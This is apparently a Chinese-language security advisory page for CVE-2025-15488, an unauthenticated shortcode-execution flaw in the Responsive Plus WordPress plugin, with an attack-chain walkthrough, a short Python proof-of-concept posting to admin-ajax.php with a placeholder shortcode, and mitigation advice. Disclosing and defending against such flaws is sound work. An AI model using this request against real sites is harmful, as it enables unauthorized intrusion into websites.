CVE-2025-15488 CVSS 6.5 中危

CVE-2025-15488: Responsive Plus插件任意Shortcode执行漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-15488

漏洞类型

远程代码执行

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Responsive Plus WordPress Plugin

漏洞概述

Responsive Plus WordPress 插件在 3.4.3 之前的版本中存在安全漏洞。该漏洞源于软件允许未认证用户执行 `update_responsive_woo_free_shipping_left_shortcode` AJAX 动作。由于未对 `content_rech_data` 参数进行充分的验证和过滤，后端直接将其作为 Shortcode 进行处理。这导致攻击者无需登录即可触发任意 Shortcode 执行，可能进一步导致敏感信息泄露或服务器被完全控制，对网站安全构成严重威胁。

技术细节

该漏洞的核心在于插件注册的 AJAX 处理函数缺乏必要的权限校验和输入过滤机制。在 WordPress 生态系统中，AJAX 动作通常需要用户具备特定权限，但该插件未对 `update_responsive_woo_free_shipping_left_shortcode` 进行身份验证检查，导致未授权访问。攻击者通过构造恶意的 HTTP POST 请求发送至 `wp-admin/admin-ajax.php`，设置 `action` 参数为漏洞接口，并在 `content_rech_data` 参数中注入恶意的 Shortcode 代码。后端接收请求后，直接将该参数值传递给 WordPress 的 `do_shortcode()` 函数进行解析和执行。由于 Shortcode 可以调用插件或主题的后端功能，攻击者可以利用此机制执行敏感操作，如读取敏感文件、写入WebShell或执行系统命令，具体影响取决于站点安装的其他组件。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标网站使用的是WordPress，并安装了Responsive Plus插件且版本低于3.4.3。

STEP 2

2. 发送恶意请求

攻击者向 `/wp-admin/admin-ajax.php` 发送POST请求，携带特定的 `action` 参数和包含恶意Shortcode的 `content_rech_data` 参数。

STEP 3

3. 服务端处理

服务器端接收到请求，由于缺乏权限验证，直接进入处理逻辑，并将 `content_rech_data` 的内容传递给 `do_shortcode` 函数。

STEP 4

4. 执行恶意代码

WordPress解析并执行恶意的Shortcode，根据Shortcode的功能执行任意代码、读取文件或获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url):
    # Target endpoint for WordPress AJAX
    url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Payload data
    # The 'action' parameter triggers the vulnerable function
    # The 'content_rech_data' contains the malicious shortcode
    data = {
        "action": "update_responsive_woo_free_shipping_left_shortcode",
        "content_rech_data": "[malicious_shortcode]" 
    }
    
    try:
        response = requests.post(url, data=data)
        if response.status_code == 200:
            print(f"[+] Request sent successfully to {url}")
            print(f"[+] Response: {response.text[:200]}")
        else:
            print(f"[-] Failed to send request, status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://example.com"
    exploit(target)

影响范围

Responsive Plus < 3.4.3

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用Responsive Plus插件以阻断攻击路径。同时，配置Web应用防火墙（WAF）规则，拦截包含 `action=update_responsive_woo_free_shipping_left_shortcode` 的请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表